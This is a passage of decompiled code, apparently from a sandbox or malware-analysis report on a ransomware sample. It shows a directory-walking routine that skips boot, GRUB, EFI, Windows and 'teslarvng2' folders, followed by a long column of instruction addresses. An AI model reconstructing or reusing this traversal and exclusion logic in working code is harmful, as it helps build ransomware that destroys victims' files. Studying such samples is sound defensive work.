                                                                    								L231:
                                                                    								_push(_t998);
                                                                    								_t967 = E00EA5F4D(_t1286, _t1316, _t1468, _t1509, _t1530);
                                                                    								L232:
                                                                    								_push(_t967);
                                                                    								E00EA5F4D(_t1286, _t1316, _t1468, _t1509, _t1530);
                                                                    								L233:
                                                                    								_push("list too long");
                                                                    								_t910 = E00EA5AB7();
                                                                    								L234:
                                                                    								_t911 = E00EA5F7A(_t910, _t1286, _t1468, _t1509, _t1530, 2);
                                                                    								L235:
                                                                    								_t912 = E00EA5F7A(_t911, _t1286, _t1468, _t1509, _t1530, 5);
                                                                    								L236:
                                                                    								 *(_t1530 + 4) = 0;
                                                                    								E00EA5F7A(_t912, _t1286, _t1468, _t1509, _t1530, 6);
                                                                    								L237:
                                                                    								E00EAED70(_t1286, _t1316, _t1468, _t1509, _t1530, __eflags);
                                                                    								asm("int3");
                                                                    								asm("int3");
                                                                    								asm("int3");
                                                                    								asm("int3");
                                                                    								asm("int3");
                                                                    								_push(_t1569);
                                                                    								_t1570 = _t1577;
                                                                    								_push(0xffffffff);
                                                                    								_push(0xec72c5);
                                                                    								_push( *[fs:0x0]);
                                                                    								_t1584 = _t1577 - 0x50;
                                                                    								_t916 =  *0xeef074; // 0x2b749d79
                                                                    								_t917 = _t916 ^ _t1570;
                                                                    								_v1380 = _t917;
                                                                    								_push(_t1286);
                                                                    								_push(_t1530);
                                                                    								_push(_t1509);
                                                                    								_push(_t917);
                                                                    								 *[fs:0x0] =  &_v1376;
                                                                    								_t1510 = _t1316;
                                                                    								__eflags =  *((intOrPtr*)( *_t1510)) -  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 4))));
                                                                    								if( *((intOrPtr*)( *_t1510)) <  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 4))))) {
                                                                    									while(1) {
                                                                    										__eflags =  *0xf2c0a8;
                                                                    										if( *0xf2c0a8 != 0) {
                                                                    											goto L257;
                                                                    										}
                                                                    										asm("lock xadd [ecx], eax");
                                                                    										_t1288 =  *((intOrPtr*)(_t1510 + 8));
                                                                    										_t925 = E00EAEC6F(_t1510, 4,  *((intOrPtr*)( *_t1288 + 0x1c)), L"boot");
                                                                    										_t1584 = _t1584 + 8;
                                                                    										__eflags = _t925;
                                                                    										if(_t925 != 0) {
                                                                    											_t927 = E00EAEC6F(_t1510, 4,  *((intOrPtr*)( *_t1288 + 0x1c)), L"grub");
                                                                    											_t1584 = _t1584 + 8;
                                                                    											__eflags = _t927;
                                                                    											if(_t927 != 0) {
                                                                    												_t929 = E00EAEC6F(_t1510, 4,  *((intOrPtr*)( *_t1288 + 0x1c)), L"EFI");
                                                                    												_t1584 = _t1584 + 8;
                                                                    												__eflags = _t929;
                                                                    												if(_t929 != 0) {
                                                                    													_t931 = E00EAEC6F(_t1510, 4,  *((intOrPtr*)( *_t1288 + 0x1c)), L"teslarvng2");
                                                                    													_t1584 = _t1584 + 8;
                                                                    													__eflags = _t931;
                                                                    													if(_t931 != 0) {
                                                                    														__eflags =  *((char*)( *((intOrPtr*)(_t1510 + 0x10))));
                                                                    														if( *((char*)( *((intOrPtr*)(_t1510 + 0x10)))) == 0) {
                                                                    															L249:
                                                                    															_push( *((intOrPtr*)( *_t1288 + 0x1c)));
                                                                    															E00E73CB0(_t1288,  &_v56,  *((intOrPtr*)(_t1510 + 0x14)), _t1510);
                                                                    															_t1584 = _t1584 + 4;
                                                                    															_v20 = 0;
                                                                    															_t936 =  *_t1288;
                                                                    															__eflags =  *(_t936 + 8) & 0x00000400;
                                                                    															if(( *(_t936 + 8) & 0x00000400) == 0) {
                                                                    																L254:
                                                                    																_t1586 = _t1584 - 0x18;
                                                                    																_v60 = _t1586;
                                                                    																_t1288 = 1;
                                                                    																E00E71920(_t1586,  &_v56);
                                                                    																_v20 = 3;
                                                                    																_v20 = 0;
                                                                    																E00E64AE0(1,  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 0x18)))), 1, _t1510,  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 0x18)))));
                                                                    																_t1584 = _t1586 + 0x18;
                                                                    															} else {
                                                                    																__eflags =  *((intOrPtr*)(_t936 + 0x18)) - 0xa0000003;
                                                                    																if( *((intOrPtr*)(_t936 + 0x18)) == 0xa0000003) {
                                                                    																	_push("\\");
                                                                    																	_t942 = E00E73CB0(_t1288,  &_v108,  &_v56, _t1510);
                                                                    																	_t1584 = _t1584 + 4;
                                                                    																	_v20 = 1;
                                                                    																	__eflags =  *((intOrPtr*)(_t942 + 0x14)) - 8;
                                                                    																	if( *((intOrPtr*)(_t942 + 0x14)) >= 8) {
                                                                    																		_t942 =  *_t942;
                                                                    																	}
                                                                    																	_t943 = E00E64A30(_t1288,  &_v84, _t942, _t1510, 4);
                                                                    																	_v20 = 2;
                                                                    																	_v20 = 1;
                                                                    																	E00E59AF0(_t1288,  &_v84, _t1510);
                                                                    																	_v20 = 0;
                                                                    																	E00E59AF0(_t1288,  &_v108, _t1510);
                                                                    																	__eflags =  *(_t943 + 0x10);
                                                                    																	if( *(_t943 + 0x10) != 0) {
                                                                    																		goto L254;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															_v20 = 0xffffffff;
                                                                    															E00E59AF0(_t1288,  &_v56, _t1510);
                                                                    														} else {
                                                                    															_t947 = E00EAEC6F(_t1510, 4,  *((intOrPtr*)( *_t1288 + 0x1c)), L"windows");
                                                                    															_t1584 = _t1584 + 8;
                                                                    															__eflags = _t947;
                                                                    															if(_t947 != 0) {
                                                                    																goto L249;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												} else {
                                                                    													asm("lock inc dword [eax]");
                                                                    												}
                                                                    											} else {
                                                                    												asm("lock inc dword [eax]");
                                                                    											}
                                                                    										} else {
                                                                    											asm("lock inc dword [eax]");
                                                                    										}
                                                                    										__eflags =  *((intOrPtr*)( *_t1510)) -  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 4))));
                                                                    										if( *((intOrPtr*)( *_t1510)) <  *((intOrPtr*)( *((intOrPtr*)(_t1510 + 4))))) {
                                                                    											continue;
                                                                    										}
                                                                    										goto L257;
                                                                    									}
                                                                    								}
                                                                    								L257:
                                                                    								 *[fs:0x0] = _v28;
                                                                    								__eflags = _v32 ^ _t1570;
                                                                    								return E00EA7663(_v32 ^ _t1570);
                                                                    							} else {
                                                                    								_t1281 =  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8;
                                                                    								_t1282 = E00E77D30( &_v1100, _t1459, _v184, _t1316, L"stock at DN check at ", 0x15,  >=  ?  *((void*)(_t1286 + 8)) : _t1286 + 8, _t1316);
                                                                    								_t1566 = _v864 | 0x00000001;
                                                                    								_v864 = _t1566;
                                                                    								if( *((intOrPtr*)(_t1282 + 0x14)) >= 8) {
                                                                    									_t1282 =  *_t1282;
                                                                    								}
                                                                    								_t1459 = 1;
                                                                    								E00E59EB0(_t1286, _t1282, 1, _t1502, _t1566);
                                                                    								_t1528 = _t1566 & 0xfffffffe;
                                                                    								_v864 = _t1566 & 0xfffffffe;
                                                                    								_v16 = 0;
                                                                    								E00E59AF0(_t1286,  &_v1100, _t1502);
                                                                    								goto L7;
                                                                    							}
                                                                    						}
                                                                    						goto L258;
                                                                    						L7:
                                                                    						_t1277 =  *0xf2c0a4; // 0x0
                                                                    					} while (_t1277 < _v40);
                                                                    					goto L8;
                                                                    				}
                                                                    				L258:
                                                                    			}






































































































































































































































































































































                                                                    0x00e665e0
                                                                    0x00e665e0
                                                                    0x00e665e0
                                                                    0x00e665e1
                                                                    0x00e665e9
                                                                    0x00e665f0
                                                                    0x00e665f4
                                                                    0x00e665f6
                                                                    0x00e665f8
                                                                    0x00e66603
                                                                    0x00e66604
                                                                    0x00e66605
                                                                    0x00e6660b
                                                                    0x00e66610
                                                                    0x00e66612
                                                                    0x00e66615
                                                                    0x00e66616
                                                                    0x00e66617
                                                                    0x00e6661b
                                                                    0x00e66621
                                                                    0x00e66627
                                                                    0x00e6662a
                                                                    0x00e66634
                                                                    0x00e6663b
                                                                    0x00e6663d
                                                                    0x00e66645
                                                                    0x00e666e7
                                                                    0x00e666e7
                                                                    0x00e666ec
                                                                    0x00e666ef
                                                                    0x00e66f74
                                                                    0x00e66f74
                                                                    0x00e66f7f
                                                                    0x00e66f84
                                                                    0x00e66f8b
                                                                    0x00e66f91
                                                                    0x00e66f97
                                                                    0x00e66fa2
                                                                    0x00e66fa7
                                                                    0x00e66fb0
                                                                    0x00e67011
                                                                    0x00e67016
                                                                    0x00e6701f
                                                                    0x00e67024
                                                                    0x00e67027
                                                                    0x00e6702a
                                                                    0x00e6702c
                                                                    0x00e6703f
                                                                    0x00e67041
                                                                    0x00e67045
                                                                    0x00e67048
                                                                    0x00e6704a
                                                                    0x00e6704e
                                                                    0x00e67053
                                                                    0x00e67056
                                                                    0x00e67058
                                                                    0x00e6705c
                                                                    0x00e67061
                                                                    0x00e67066
                                                                    0x00e6706d
                                                                    0x00e67074
                                                                    0x00e67074
                                                                    0x00e67077
                                                                    0x00e67081
                                                                    0x00e67086
                                                                    0x00e67089
                                                                    0x00e67089
                                                                    0x00e67092
                                                                    0x00e67097
                                                                    0x00e670a0
                                                                    0x00e670a5
                                                                    0x00e670ab
                                                                    0x00e670b3
                                                                    0x00e670b6
                                                                    0x00e66fb2
                                                                    0x00e66fb2
                                                                    0x00e66fc2
                                                                    0x00e66fc4
                                                                    0x00e66fcd
                                                                    0x00e66fd1
                                                                    0x00e66fd6
                                                                    0x00e66fdb
                                                                    0x00e66fdf
                                                                    0x00e66fe4
                                                                    0x00e66fe9
                                                                    0x00e66ff0
                                                                    0x00e66ff7
                                                                    0x00e66ff7
                                                                    0x00e66ffa
                                                                    0x00e67004
                                                                    0x00e67004
                                                                    0x00e670c2
                                                                    0x00e670c9
                                                                    0x00e670ce
                                                                    0x00e670d1
                                                                    0x00e670d9
                                                                    0x00e670db
                                                                    0x00e670db
                                                                    0x00e670dd
                                                                    0x00e670e1
                                                                    0x00e670e6
                                                                    0x00e670f0
                                                                    0x00e67104
                                                                    0x00e67108
                                                                    0x00e67114
                                                                    0x00e67119
                                                                    0x00e6711e
                                                                    0x00e67123
                                                                    0x00e6727f
                                                                    0x00e6727f
                                                                    0x00e67129
                                                                    0x00e6712d
                                                                    0x00e67133
                                                                    0x00e67143
                                                                    0x00e67148
                                                                    0x00e6714b
                                                                    0x00e67153
                                                                    0x00e67155
                                                                    0x00e67155
                                                                    0x00e67158
                                                                    0x00e67160
                                                                    0x00e6716a
                                                                    0x00e67180
                                                                    0x00e67185
                                                                    0x00e67188
                                                                    0x00e6718d
                                                                    0x00e67190
                                                                    0x00e67198
                                                                    0x00e6719a
                                                                    0x00e6719a
                                                                    0x00e6719d
                                                                    0x00e671a5
                                                                    0x00e671af
                                                                    0x00e671b7
                                                                    0x00e671b9
                                                                    0x00e671b9
                                                                    0x00e671ba
                                                                    0x00e671c8
                                                                    0x00e671cd
                                                                    0x00e671d0
                                                                    0x00e671d8
                                                                    0x00e671da
                                                                    0x00e671da
                                                                    0x00e671dd
                                                                    0x00e671e5
                                                                    0x00e671ef
                                                                    0x00e671f7
                                                                    0x00e671f9
                                                                    0x00e671f9
                                                                    0x00e671fa
                                                                    0x00e67208
                                                                    0x00e6720d
                                                                    0x00e67210
                                                                    0x00e67218
                                                                    0x00e6721a
                                                                    0x00e6721a
                                                                    0x00e6721d
                                                                    0x00e67225
                                                                    0x00e6722f
                                                                    0x00e67237
                                                                    0x00e67239
                                                                    0x00e67239
                                                                    0x00e6723a
                                                                    0x00e6723f
                                                                    0x00e67248
                                                                    0x00e6724d
                                                                    0x00e67250
                                                                    0x00e67258
                                                                    0x00e6725a
                                                                    0x00e6725a
                                                                    0x00e6725d
                                                                    0x00e67263
                                                                    0x00e67265
                                                                    0x00e6726f
                                                                    0x00e67277
                                                                    0x00e67279
                                                                    0x00e67279
                                                                    0x00e6727d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6727d
                                                                    0x00e6712d
                                                                    0x00e67292
                                                                    0x00e6729e
                                                                    0x00e672a3
                                                                    0x00e672a8
                                                                    0x00e672ad
                                                                    0x00e672bd
                                                                    0x00e672c4
                                                                    0x00e672cc
                                                                    0x00e672dd
                                                                    0x00e672e2
                                                                    0x00e672e5
                                                                    0x00e672e9
                                                                    0x00e672ed
                                                                    0x00e672ef
                                                                    0x00e672ef
                                                                    0x00e672f1
                                                                    0x00e672f5
                                                                    0x00e672fa
                                                                    0x00e67304
                                                                    0x00e67309
                                                                    0x00e67313
                                                                    0x00e67313
                                                                    0x00e67322
                                                                    0x00e67327
                                                                    0x00e67336
                                                                    0x00e6733b
                                                                    0x00e6733e
                                                                    0x00e67343
                                                                    0x00e67345
                                                                    0x00e6734c
                                                                    0x00e67353
                                                                    0x00e67358
                                                                    0x00e6735b
                                                                    0x00e6735d
                                                                    0x00e67360
                                                                    0x00e67363
                                                                    0x00e67367
                                                                    0x00e6736a
                                                                    0x00e6736f
                                                                    0x00e67376
                                                                    0x00e6737d
                                                                    0x00e67384
                                                                    0x00e6738b
                                                                    0x00e673a3
                                                                    0x00e673ab
                                                                    0x00e673b1
                                                                    0x00e673ba
                                                                    0x00e67513
                                                                    0x00e67519
                                                                    0x00e6751f
                                                                    0x00e67527
                                                                    0x00e67527
                                                                    0x00e6752d
                                                                    0x00e67533
                                                                    0x00e67536
                                                                    0x00e67542
                                                                    0x00e67548
                                                                    0x00e6754b
                                                                    0x00e67551
                                                                    0x00e67557
                                                                    0x00e67561
                                                                    0x00e67561
                                                                    0x00e67564
                                                                    0x00e67567
                                                                    0x00e67567
                                                                    0x00e6756c
                                                                    0x00e6756c
                                                                    0x00e6756e
                                                                    0x00e67570
                                                                    0x00e67576
                                                                    0x00e67579
                                                                    0x00e6757f
                                                                    0x00e67581
                                                                    0x00e67583
                                                                    0x00e6758a
                                                                    0x00e67593
                                                                    0x00e67599
                                                                    0x00e6759b
                                                                    0x00e6759e
                                                                    0x00e6759e
                                                                    0x00e675a2
                                                                    0x00e675ae
                                                                    0x00e675b8
                                                                    0x00e675bd
                                                                    0x00e675c0
                                                                    0x00e675c6
                                                                    0x00e675ca
                                                                    0x00e675d1
                                                                    0x00e67678
                                                                    0x00e6767f
                                                                    0x00e67682
                                                                    0x00000000
                                                                    0x00e67688
                                                                    0x00e6768b
                                                                    0x00e67695
                                                                    0x00e6769b
                                                                    0x00e6769f
                                                                    0x00e676a1
                                                                    0x00e676b0
                                                                    0x00e676b2
                                                                    0x00e676bb
                                                                    0x00e676c1
                                                                    0x00e676c5
                                                                    0x00e676ca
                                                                    0x00e676ce
                                                                    0x00e676ce
                                                                    0x00e676ce
                                                                    0x00e676d1
                                                                    0x00e676d4
                                                                    0x00e676d6
                                                                    0x00e676d9
                                                                    0x00e676dc
                                                                    0x00e676e6
                                                                    0x00e676e8
                                                                    0x00000000
                                                                    0x00e676e8
                                                                    0x00e675d7
                                                                    0x00e675d7
                                                                    0x00e675dc
                                                                    0x00e675e0
                                                                    0x00e675e0
                                                                    0x00e675e3
                                                                    0x00e675e6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e675e8
                                                                    0x00e675eb
                                                                    0x00e67602
                                                                    0x00e67602
                                                                    0x00e675ed
                                                                    0x00e675ed
                                                                    0x00e675f1
                                                                    0x00e675f1
                                                                    0x00e675f5
                                                                    0x00000000
                                                                    0x00e675f7
                                                                    0x00e675f7
                                                                    0x00e675fa
                                                                    0x00e675fd
                                                                    0x00e67600
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67600
                                                                    0x00e675f5
                                                                    0x00e6760b
                                                                    0x00e6760b
                                                                    0x00e6760d
                                                                    0x00e67613
                                                                    0x00e67618
                                                                    0x00e67618
                                                                    0x00e6761b
                                                                    0x00e6761e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67620
                                                                    0x00e67623
                                                                    0x00e6763a
                                                                    0x00e6763a
                                                                    0x00e67625
                                                                    0x00e67625
                                                                    0x00e67629
                                                                    0x00e67629
                                                                    0x00e6762d
                                                                    0x00000000
                                                                    0x00e6762f
                                                                    0x00e6762f
                                                                    0x00e67632
                                                                    0x00e67635
                                                                    0x00e67638
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67638
                                                                    0x00e6762d
                                                                    0x00e67643
                                                                    0x00e67643
                                                                    0x00e67645
                                                                    0x00e6764b
                                                                    0x00e67654
                                                                    0x00e67655
                                                                    0x00e67658
                                                                    0x00e6766d
                                                                    0x00e67671
                                                                    0x00e6765a
                                                                    0x00e6765c
                                                                    0x00e67661
                                                                    0x00e67664
                                                                    0x00e67664
                                                                    0x00e67658
                                                                    0x00000000
                                                                    0x00e67645
                                                                    0x00e6763e
                                                                    0x00e67640
                                                                    0x00e67640
                                                                    0x00000000
                                                                    0x00e67640
                                                                    0x00000000
                                                                    0x00e6760d
                                                                    0x00e67606
                                                                    0x00e67608
                                                                    0x00e67608
                                                                    0x00000000
                                                                    0x00e67608
                                                                    0x00000000
                                                                    0x00e676ec
                                                                    0x00e676ec
                                                                    0x00e676fa
                                                                    0x00e67700
                                                                    0x00e67702
                                                                    0x00e6770c
                                                                    0x00e67711
                                                                    0x00e67714
                                                                    0x00e67714
                                                                    0x00e6771c
                                                                    0x00e67722
                                                                    0x00e67725
                                                                    0x00e67739
                                                                    0x00e6773e
                                                                    0x00e6774f
                                                                    0x00e67757
                                                                    0x00e6776a
                                                                    0x00e6776f
                                                                    0x00e67772
                                                                    0x00e67776
                                                                    0x00e6777a
                                                                    0x00e6777c
                                                                    0x00e6777c
                                                                    0x00e67782
                                                                    0x00e67787
                                                                    0x00e67791
                                                                    0x00e67796
                                                                    0x00e677a0
                                                                    0x00e677a5
                                                                    0x00e677af
                                                                    0x00e677af
                                                                    0x00e677b5
                                                                    0x00000000
                                                                    0x00e673c0
                                                                    0x00e673c9
                                                                    0x00e677bb
                                                                    0x00e677c7
                                                                    0x00e677c8
                                                                    0x00e677cf
                                                                    0x00e677d5
                                                                    0x00e677dc
                                                                    0x00e677de
                                                                    0x00e677e2
                                                                    0x00e677e5
                                                                    0x00e677eb
                                                                    0x00e677ed
                                                                    0x00e677ef
                                                                    0x00e67cba
                                                                    0x00e67cbd
                                                                    0x00e67cc5
                                                                    0x00e67cc8
                                                                    0x00e67cd3
                                                                    0x00e67cd8
                                                                    0x00e67cdb
                                                                    0x00e67cdd
                                                                    0x00000000
                                                                    0x00e67ce3
                                                                    0x00e67ce6
                                                                    0x00e67ced
                                                                    0x00e67cf2
                                                                    0x00e67cf8
                                                                    0x00e67d03
                                                                    0x00e67d08
                                                                    0x00e67d13
                                                                    0x00e67d16
                                                                    0x00e67d1b
                                                                    0x00e67d25
                                                                    0x00e67d30
                                                                    0x00e67d33
                                                                    0x00e67d3e
                                                                    0x00e67d46
                                                                    0x00e67d4c
                                                                    0x00e67d58
                                                                    0x00e67d5d
                                                                    0x00e67d64
                                                                    0x00e67d6e
                                                                    0x00e67d75
                                                                    0x00e67d7b
                                                                    0x00e67d82
                                                                    0x00e67d89
                                                                    0x00e67d90
                                                                    0x00e67d9a
                                                                    0x00e67da6
                                                                    0x00e67daf
                                                                    0x00e67db8
                                                                    0x00e67dc1
                                                                    0x00e67dcd
                                                                    0x00e67dd6
                                                                    0x00e67de0
                                                                    0x00e67de4
                                                                    0x00e67deb
                                                                    0x00e67df7
                                                                    0x00e67e01
                                                                    0x00e67e08
                                                                    0x00e67e0e
                                                                    0x00e67e16
                                                                    0x00e67e1e
                                                                    0x00e67e22
                                                                    0x00e67e28
                                                                    0x00e67e36
                                                                    0x00e67e40
                                                                    0x00e67e40
                                                                    0x00e67e4a
                                                                    0x00e67e4e
                                                                    0x00e67e55
                                                                    0x00e67e57
                                                                    0x00e67e5a
                                                                    0x00e67e60
                                                                    0x00e67e64
                                                                    0x00e67e6a
                                                                    0x00e67e70
                                                                    0x00e67e77
                                                                    0x00e67e7b
                                                                    0x00e67e81
                                                                    0x00e67e83
                                                                    0x00e67e8c
                                                                    0x00e67e92
                                                                    0x00e67e98
                                                                    0x00e67e9a
                                                                    0x00e67ea0
                                                                    0x00e67ea0
                                                                    0x00e67ea3
                                                                    0x00e67eb8
                                                                    0x00e67ebb
                                                                    0x00e67ec3
                                                                    0x00e67ec9
                                                                    0x00e67ece
                                                                    0x00e67ed1
                                                                    0x00e67ed7
                                                                    0x00e67ed9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67edf
                                                                    0x00e67ee2
                                                                    0x00e67eec
                                                                    0x00e67ef2
                                                                    0x00e67ef6
                                                                    0x00e67ef9
                                                                    0x00e67efc
                                                                    0x00e67f26
                                                                    0x00e67f28
                                                                    0x00e67f2b
                                                                    0x00e67efe
                                                                    0x00e67f04
                                                                    0x00e67f07
                                                                    0x00e67f0d
                                                                    0x00e67f15
                                                                    0x00e67f17
                                                                    0x00e67f1a
                                                                    0x00e67f1a
                                                                    0x00e67f30
                                                                    0x00e67f34
                                                                    0x00e67f3b
                                                                    0x00000000
                                                                    0x00e67f41
                                                                    0x00e67f47
                                                                    0x00e67f48
                                                                    0x00e67f4e
                                                                    0x00e67f51
                                                                    0x00000000
                                                                    0x00e67f57
                                                                    0x00e67f57
                                                                    0x00e67f5a
                                                                    0x00e67f5d
                                                                    0x00e67f5f
                                                                    0x00e67f98
                                                                    0x00e67f9b
                                                                    0x00e67f9e
                                                                    0x00e67fa0
                                                                    0x00e67fa4
                                                                    0x00e67fae
                                                                    0x00e67fb5
                                                                    0x00e67fba
                                                                    0x00e67fbd
                                                                    0x00e67fc1
                                                                    0x00e67fc5
                                                                    0x00e67fc7
                                                                    0x00e67fc7
                                                                    0x00e67fc9
                                                                    0x00e67fcd
                                                                    0x00e67fd2
                                                                    0x00e67fdc
                                                                    0x00e67fdc
                                                                    0x00e67fa4
                                                                    0x00e67fe1
                                                                    0x00e67fe5
                                                                    0x00e67feb
                                                                    0x00e67fed
                                                                    0x00e67ff1
                                                                    0x00e67ff4
                                                                    0x00e67ffa
                                                                    0x00e67ffe
                                                                    0x00e67ffe
                                                                    0x00e68002
                                                                    0x00e6800a
                                                                    0x00e6800c
                                                                    0x00e6800c
                                                                    0x00e68016
                                                                    0x00e6801d
                                                                    0x00e68022
                                                                    0x00e68026
                                                                    0x00e68029
                                                                    0x00e6802b
                                                                    0x00e6802d
                                                                    0x00e68030
                                                                    0x00e68032
                                                                    0x00e68034
                                                                    0x00e68037
                                                                    0x00e6803c
                                                                    0x00e6803f
                                                                    0x00e68042
                                                                    0x00e68042
                                                                    0x00e68046
                                                                    0x00e68046
                                                                    0x00e68051
                                                                    0x00e68059
                                                                    0x00e6805e
                                                                    0x00e68065
                                                                    0x00e6806c
                                                                    0x00e6806c
                                                                    0x00e68073
                                                                    0x00e6807a
                                                                    0x00e6807f
                                                                    0x00e68089
                                                                    0x00e6808e
                                                                    0x00e68092
                                                                    0x00000000
                                                                    0x00e68098
                                                                    0x00e680a2
                                                                    0x00e680a5
                                                                    0x00e680a9
                                                                    0x00e680b3
                                                                    0x00e680be
                                                                    0x00e680c3
                                                                    0x00e680c9
                                                                    0x00e680d1
                                                                    0x00e680d3
                                                                    0x00e680d9
                                                                    0x00e680de
                                                                    0x00e680e5
                                                                    0x00e680e8
                                                                    0x00e680ec
                                                                    0x00e680f3
                                                                    0x00e680fd
                                                                    0x00e68100
                                                                    0x00e68106
                                                                    0x00e6811f
                                                                    0x00e68124
                                                                    0x00e68127
                                                                    0x00e6812a
                                                                    0x00e6812c
                                                                    0x00e6812e
                                                                    0x00000000
                                                                    0x00e68134
                                                                    0x00e68137
                                                                    0x00e68141
                                                                    0x00e68147
                                                                    0x00e6814b
                                                                    0x00e68151
                                                                    0x00e68158
                                                                    0x00e6815a
                                                                    0x00000000
                                                                    0x00e68160
                                                                    0x00e68160
                                                                    0x00e68166
                                                                    0x00e68170
                                                                    0x00e68174
                                                                    0x00e68176
                                                                    0x00e68180
                                                                    0x00e68188
                                                                    0x00e6818e
                                                                    0x00e68191
                                                                    0x00e6819b
                                                                    0x00e681a5
                                                                    0x00e681a8
                                                                    0x00e681ab
                                                                    0x00e681ad
                                                                    0x00e681b0
                                                                    0x00e681b3
                                                                    0x00e681b5
                                                                    0x00000000
                                                                    0x00e681b5
                                                                    0x00e6815a
                                                                    0x00e6812e
                                                                    0x00e67f61
                                                                    0x00e67f61
                                                                    0x00e67f61
                                                                    0x00e67f65
                                                                    0x00000000
                                                                    0x00e67f67
                                                                    0x00e67f6c
                                                                    0x00e67f6f
                                                                    0x00000000
                                                                    0x00e67f75
                                                                    0x00e67f7c
                                                                    0x00e67f81
                                                                    0x00e67f84
                                                                    0x00e67f86
                                                                    0x00000000
                                                                    0x00e67f8c
                                                                    0x00e67f8c
                                                                    0x00e67f8e
                                                                    0x00000000
                                                                    0x00e67f8e
                                                                    0x00e67f86
                                                                    0x00e67f6f
                                                                    0x00000000
                                                                    0x00e67f91
                                                                    0x00e67f91
                                                                    0x00e67f94
                                                                    0x00e67f94
                                                                    0x00000000
                                                                    0x00e67f61
                                                                    0x00e67f5f
                                                                    0x00e67f51
                                                                    0x00000000
                                                                    0x00e67f3b
                                                                    0x00e681c0
                                                                    0x00e681ca
                                                                    0x00000000
                                                                    0x00e681ca
                                                                    0x00e677f5
                                                                    0x00e677f5
                                                                    0x00e67800
                                                                    0x00e67808
                                                                    0x00e6780d
                                                                    0x00e67810
                                                                    0x00e67812
                                                                    0x00000000
                                                                    0x00e67818
                                                                    0x00e67820
                                                                    0x00e67825
                                                                    0x00e67828
                                                                    0x00e6782a
                                                                    0x00000000
                                                                    0x00e67830
                                                                    0x00e67838
                                                                    0x00e6783d
                                                                    0x00e67840
                                                                    0x00e67842
                                                                    0x00000000
                                                                    0x00e67848
                                                                    0x00e67850
                                                                    0x00e67855
                                                                    0x00e67858
                                                                    0x00e6785a
                                                                    0x00000000
                                                                    0x00e67860
                                                                    0x00e67868
                                                                    0x00e6786d
                                                                    0x00e67870
                                                                    0x00e67872
                                                                    0x00000000
                                                                    0x00e67878
                                                                    0x00e67880
                                                                    0x00e67885
                                                                    0x00e67888
                                                                    0x00e6788a
                                                                    0x00000000
                                                                    0x00e67890
                                                                    0x00e67898
                                                                    0x00e6789d
                                                                    0x00e678a0
                                                                    0x00e678a2
                                                                    0x00000000
                                                                    0x00e678a8
                                                                    0x00e678a8
                                                                    0x00e678ab
                                                                    0x00e678ad
                                                                    0x00e678b6
                                                                    0x00e678c0
                                                                    0x00e678c0
                                                                    0x00e678c3
                                                                    0x00e678c6
                                                                    0x00e678c6
                                                                    0x00e678d1
                                                                    0x00e678d3
                                                                    0x00e678d9
                                                                    0x00e678dc
                                                                    0x00e678de
                                                                    0x00e678e0
                                                                    0x00e678e3
                                                                    0x00e678e3
                                                                    0x00e678e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e678e9
                                                                    0x00e678ec
                                                                    0x00e678ec
                                                                    0x00e678ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e678f1
                                                                    0x00000000
                                                                    0x00e678ef
                                                                    0x00e678fc
                                                                    0x00e678fc
                                                                    0x00e678ff
                                                                    0x00e678ff
                                                                    0x00e67905
                                                                    0x00e67905
                                                                    0x00e67910
                                                                    0x00e67916
                                                                    0x00e67924
                                                                    0x00e6792a
                                                                    0x00e6792c
                                                                    0x00e6792f
                                                                    0x00e67935
                                                                    0x00e67937
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67939
                                                                    0x00e6793f
                                                                    0x00e6793f
                                                                    0x00e67947
                                                                    0x00e6795a
                                                                    0x00e67966
                                                                    0x00e6798f
                                                                    0x00e67994
                                                                    0x00e6799a
                                                                    0x00e679a2
                                                                    0x00e679a7
                                                                    0x00e679ad
                                                                    0x00e679af
                                                                    0x00e67ca2
                                                                    0x00e67ca8
                                                                    0x00e67cad
                                                                    0x00000000
                                                                    0x00e679b5
                                                                    0x00e679b5
                                                                    0x00e679b9
                                                                    0x00e679c8
                                                                    0x00e679c8
                                                                    0x00e679d3
                                                                    0x00e679d8
                                                                    0x00e679da
                                                                    0x00000000
                                                                    0x00e679dc
                                                                    0x00e679df
                                                                    0x00e679e2
                                                                    0x00e679ea
                                                                    0x00e679ee
                                                                    0x00e679f4
                                                                    0x00e679fa
                                                                    0x00e679ff
                                                                    0x00e67a02
                                                                    0x00e67a04
                                                                    0x00000000
                                                                    0x00e67a0a
                                                                    0x00e67a0a
                                                                    0x00e67a1a
                                                                    0x00e67a2b
                                                                    0x00e67a31
                                                                    0x00e67a36
                                                                    0x00e67a47
                                                                    0x00e67a4c
                                                                    0x00e67a50
                                                                    0x00000000
                                                                    0x00e67a50
                                                                    0x00e67a04
                                                                    0x00e679bb
                                                                    0x00e679bb
                                                                    0x00e679c2
                                                                    0x00e67a5b
                                                                    0x00e67a5b
                                                                    0x00e67a5e
                                                                    0x00e67a61
                                                                    0x00e67a63
                                                                    0x00e67c0e
                                                                    0x00e67c11
                                                                    0x00e67c14
                                                                    0x00e67c1c
                                                                    0x00e67c20
                                                                    0x00e67c26
                                                                    0x00e67c2c
                                                                    0x00e67c31
                                                                    0x00e67c34
                                                                    0x00e67c36
                                                                    0x00000000
                                                                    0x00e67c3c
                                                                    0x00e67c3c
                                                                    0x00e67c4c
                                                                    0x00e67c5a
                                                                    0x00e67c5a
                                                                    0x00e67c5d
                                                                    0x00e67c63
                                                                    0x00e67c68
                                                                    0x00e67c79
                                                                    0x00e67c7e
                                                                    0x00e67c82
                                                                    0x00000000
                                                                    0x00e67c82
                                                                    0x00e67a69
                                                                    0x00e67a69
                                                                    0x00e67a6e
